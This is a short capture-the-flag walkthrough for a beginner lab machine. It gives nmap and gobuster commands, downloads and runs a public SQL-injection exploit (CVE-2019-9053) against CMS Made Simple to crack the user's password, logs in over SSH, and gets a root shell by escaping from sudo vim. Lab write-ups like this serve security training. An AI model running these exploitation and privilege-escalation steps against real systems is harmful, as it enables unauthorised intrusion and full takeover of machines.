Beginner level ctf
We will start a nmap scan
nmap -A -T4 10.10.232.89
We found 2 services running below port 1000, namely FTP (21) and HTTP (80)
We can see that ssh is running on the higher port (2222)
I just view the default web page and see nothing, so let's use gobuster to find something
gobuster dir -u http://10.10.232.89/ -w /usr/share/wordlists/dirb/common.txt -t 30
let's see /robots.txt file
and /simple page
at the end of page, i see its version
searchsploit cms made simple 2.2.8
We can download the exploit using searchsploit -m 46635.py
The CVE is CVE-2019-9053 and vulnerability type is SQLi
On the script, i see some python library to install with pip and 3 parameters to use
python2.7 46635.py -u http://10.10.206.254/simple --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt
wait a while, you will find the password
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
Now try to connect ssh server with "mitch" user and a "secret" password
ssh mitch@10.10.206.254 -p 2222
and we found the user.txt flag
let's see what other is under /home directory
$ ls /home
mitch sunbath
sudo -l -l
Only Vim can be run as root
sudo vim
In Vim, use the command :!sh to play shell on vim
